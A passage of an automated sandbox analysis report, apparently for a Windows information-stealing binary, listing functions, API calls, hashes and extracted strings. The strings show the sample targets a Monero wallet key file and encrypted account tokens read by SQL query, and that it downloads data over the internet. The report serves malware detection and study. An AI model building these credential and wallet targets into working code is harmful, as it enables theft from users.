                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                            • Instruction ID: 4f868e10947a5e448c6f051c7a655e6c3dc10ab58ec58b278c08abc5bb890c52
                            • Opcode Fuzzy Hash: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                            • Instruction Fuzzy Hash: 3D517FB1900218ABDF24EFA0DD49FEE77B9FB04705F108198B605A72C1DB746A85CF95
                            Function 0068BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0068BC9F
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0068BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0068BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                            • Instruction ID: b8b1f8409d98e8cd909572619cedec3c26b8d2eea17923cd6a1b05ed608e1686
                            • Opcode Fuzzy Hash: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                            • Instruction Fuzzy Hash: FEB12B719201189BDF44FBE0DD96EEE73BEBF14300F40415CF506A6591EE346A49CBAA
                            Function 00696770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                            • Instruction ID: f9f427c572ab6a67ac0c4e0525b1532d487a78faf117dedd3129fc90ed726f3d
                            • Opcode Fuzzy Hash: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                            • Instruction Fuzzy Hash: AEF0583090820DEFD748AFE0ED1DB6CBB74FB0470BF040199F6498A790EA704B419BA6
                            Function 00684FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00684FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00684FD1
                            • InternetOpenA.WININET(006A0DDF,00000000,00000000,00000000,00000000), ref: 00684FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685041
                            • InternetCloseHandle.WININET(?), ref: 006850B9
                            • InternetCloseHandle.WININET(?), ref: 006850C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: b64ff51ef5019e2c22e9beb6779b1696bf7f8bdf9f90769bf6b78435f064ea63
                            • Instruction ID: 39d110897a3fd39c7d440c2cf97b93af754b6efcef05eae3574a1a4393a238ac
                            • Opcode Fuzzy Hash: b64ff51ef5019e2c22e9beb6779b1696bf7f8bdf9f90769bf6b78435f064ea63
                            • Instruction Fuzzy Hash: 1331E4B4A4021CABDB24DF54DC85BDCB7B5FB48708F1081E9EA09A7281C6706AC58F99
                            Function 006983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                            • wsprintfA.USER32 ref: 00698459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,013ADF48,00000000,000F003F,?,00000400), ref: 006984EC
                            • lstrlen.KERNEL32(?), ref: 00698501
                            • RegQueryValueExA.ADVAPI32(00000000,013ADF18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B34), ref: 00698599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                            • Instruction ID: d43f031d78324e430754a0d7ac8fb52dd1c93ca5ba51c03f7c7904f3f0f632ad
                            • Opcode Fuzzy Hash: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                            • Instruction Fuzzy Hash: 3721D67191022CAFDB68DB54DC85FE9B3B9FB48704F00C598A649A6240DE71AA85CFE4
                            Function 00697690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006976A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006976AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B7E0,00000000,00020119,00000000), ref: 006976DD
                            • RegQueryValueExA.ADVAPI32(00000000,013ADE88,00000000,00000000,?,000000FF), ref: 006976FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00697708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                            • Instruction ID: eca3a8a2fd42452c9dc7913312eb2aa4cab177b105e3fd6d8e01069622f18d4f
                            • Opcode Fuzzy Hash: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                            • Instruction Fuzzy Hash: 0E0162B5A04208BBEB04DBE4DC4DFBEB7BDFB48705F104054FA04EB290D67099048B51
                            Function 00697720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0069773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B7E0,00000000,00020119,006976B9), ref: 0069775B
                            • RegQueryValueExA.ADVAPI32(006976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069777A
                            • RegCloseKey.ADVAPI32(006976B9), ref: 00697784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                            • Instruction ID: f23030703108f302c0a53459626327028e8a21bd1548e73eff2321a411ba3e0a
                            • Opcode Fuzzy Hash: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                            • Instruction Fuzzy Hash: AB01FFB5A40308BBEB04DBE4DC4AFAEB7B8FB48705F104559FA05A7281DA715A008B51
                            Function 006992E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693AEE,?), ref: 006992FC
                            • GetFileSizeEx.KERNEL32(000000FF,:i), ref: 00699319
                            • CloseHandle.KERNEL32(000000FF), ref: 00699327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :i$:i
                            • API String ID: 1378416451-3159782484
                            • Opcode ID: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                            • Instruction ID: b6483a82c526e8679f64a02452f71716c278dff5426dab02b160c6d990979f93
                            • Opcode Fuzzy Hash: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                            • Instruction Fuzzy Hash: F1F01475E40208ABDF14DFB4DC49F9E77BABB48720F108258AA91A72C0D671AA018B60
                            Function 006940B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006940D5
                            • RegOpenKeyExA.ADVAPI32(80000001,013AD138,00000000,00020119,?), ref: 006940F4
                            • RegQueryValueExA.ADVAPI32(?,013AD858,00000000,00000000,00000000,000000FF), ref: 00694118
                            • RegCloseKey.ADVAPI32(?), ref: 00694122
                            • lstrcat.KERNEL32(?,00000000), ref: 00694147
                            • lstrcat.KERNEL32(?,013AD8B8), ref: 0069415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                            • Instruction ID: 07802b373791e756e176d0fff57a86ebd99e98c4738a18932a3b2143891a84a3
                            • Opcode Fuzzy Hash: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                            • Instruction Fuzzy Hash: 5A4189B6D0010C6BDB18FBA0EC56FFE737DBB88304F00455DB61697181EA755B888B92
                            Function 006899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                            • LocalFree.KERNEL32(0068148F), ref: 00689A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                            • Instruction ID: 765e87513dbaaae75a2fdaa2f3b445dde7baf82764d28dc5f07e325306fbc69e
                            • Opcode Fuzzy Hash: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                            • Instruction Fuzzy Hash: DC31F3B4A00209EFDB18DF94C985BEE77BABF48304F108258E911A7390D775AA41CFA1
                            Function 0069C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
